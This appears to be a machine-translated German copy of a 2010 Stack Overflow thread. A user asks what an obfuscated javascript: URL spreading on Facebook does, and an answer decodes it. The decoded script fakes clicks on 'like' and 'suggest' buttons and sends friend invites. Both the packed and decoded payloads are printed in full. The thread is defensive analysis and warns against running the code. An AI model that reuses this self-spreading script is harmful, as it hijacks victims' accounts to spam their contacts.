Was genau hat es mit diesem Stück von JavaScript nicht?

Sah ich diese Seite wächst in der Popularität unter meine sozialen Kreise auf Facebook, was 98 Prozent bla bla... und es geht den Benutzer durch kopieren der unten JavaScript (ich fügte hinzu, einige Einrückung um Sie lesbarer zu machen) in Ihre Adresse bar. Sieht dodgy zu mir, aber ich habe nur eine sehr grundlegende Kenntnisse in JavaScript.

Einfach gesagt, was macht das?

javascript:(function(){
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
eval(function(p,a,c,k,e,r){
    e=function(c){
        return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
    ;
    if(!''.replace(/^/,String)){
        while(c--)r[e(c)]=k[c]||e(c);
        k=[function(e){
            return r[e]}
        ];
        e=function(){
            return'\\w+'}
        ;
        c=1}
    ;
    while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
    return p}
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
        d=U;
        d[e[2]](V)[e[1]][e[0]]=e[3];
        d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
        s=d[e[2]](e[6]);
        m=d[e[2]](e[7]);
        c=d[e[9]](e[8]);
        c[e[11]](e[10],I,I);
        s[e[12]](c);
        C(D(){
            W[e[13]]()}
        ,E);
        C(D(){
            X[e[16]](e[14],e[15])}
        ,E);
        C(D(){
            m[e[12]](c);
            d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
        ,E);
        ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{
}
))})();
  • Das riecht phishy für mich....
  • Ich bin sicher, wenn Sie klebte es in Eure Adressleiste, Sie würde es herausfinden. Würde ich eher nicht tun.
  • Stimmen. Super lückenhaft.
  • Vielen Dank für diese Bearbeitung 😀 Sehen 'Dosis' ganz über dem Platz war für mich verrückt.
InformationsquelleAutor Waltzy | 2010-04-28
  1. 9

    Ich weiß nicht, so viele sind dieses downvoting. Sie sind absolut zu Recht misstrauisch verpackt und auch sonst-verschleierte Skripts, die vor allem mit Hautausschlag der malvertisements Auswirkungen auf die FB-apps im moment.

    Der erste trick ist, ersetzen Sie die eval auf die Ergebnisse der Entpacker mit einer alert so können Sie den code anstatt es auszuführen. Das gibt Ihnen etwas, das Sie leicht (aber langweilig) manuell zu entschlüsseln:

    document.getElementById('app120668947950042_mwrapper').style.visibility='hidden';        
document.getElementById('app120668947950042_jop').innerHTML=document.getElementById('app120668947950042_jode').value;
s=document.getElementById('suggest');
m=document.getElementById('likeme');
c=document.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);

setTimeout(function(){
    fs.select_all()
}, 5000);
setTimeout(function(){
    SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function(){
    m.dispatchEvent(c);
    document.getElementById('app120668947950042_ifo').innerHTML=document.getElementById('app120668947950042_ifc').value
}, 5000);

    Wie es aussieht, ist vorgetäuscht, klicken Sie auf den "gefällt mir" und "empfehlen" - buttons (und der nachfolgende Dialog), unter Umgehung der normalen Kontrollen FB benötigen, um mit der Website interagieren.

    Ich würde Berichts dieser Seite auf FB.

    Im Allgemeinen, etwas, das Sie auffordert, geben Sie einen JavaScript-URL ist nichts gutes. Dies ist die poor-man ' s-XSS. Indem jemand den code auf einer Seite durch eine JS-URL, auf die Sie Vertrauen darauf, dass Sie tun, was Sie wollen mit Ihrer Nutzung der Website, als dieser groben social-engineering-Versuch demonstriert werden. Es ist deprimierend, wenn viele Leute sind, fallen für diesen. Vielleicht ist es Zeit für Browser zu verbieten, Tippen javascript: URLs in der Adressleiste.

    Fluch Sie Netscape für die Erfindung des hässlichen javascript: nicht-wirklich-eine-URL-hack und die Tausende von Sicherheitslücken, die dazu geführt haben von ihm!

    • Warum downvotes? Vorsicht, wahrscheinlich. Wenn es war zuerst veröffentlicht, es war schwer zu sagen, ob es war eine legitime Frage, oder wenn die OP wollte nur jemanden, führen Sie es in Ihren browser (für bösartige Zwecke).
    • Vielen Dank für die Zeit nehmen, dies zu tun; ich habe Bericht von der Seite, aber facebook meist scheint zufrieden zu lassen, Dinge wie diese sitzen. nochmals vielen Dank
    InformationsquelleAutor bobince
  2. 2

    Auf den ersten Blick sieht es aus wie eine Verpackung die Funktion, für die Komprimierung von code in einen string. Betrachten Sie es wie gzip-Komprimierung.

    InformationsquelleAutor Mitch Dempsey
  3. 1

    Sieht wie die code laden Sie Ihre Freunde zum Beitritt in eine Gruppe oder etwas entlang jenen Linien..

    Habe Sie im Umlauf facebook für eine Weile.

    InformationsquelleAutor joshowen
Schreibe einen Kommentar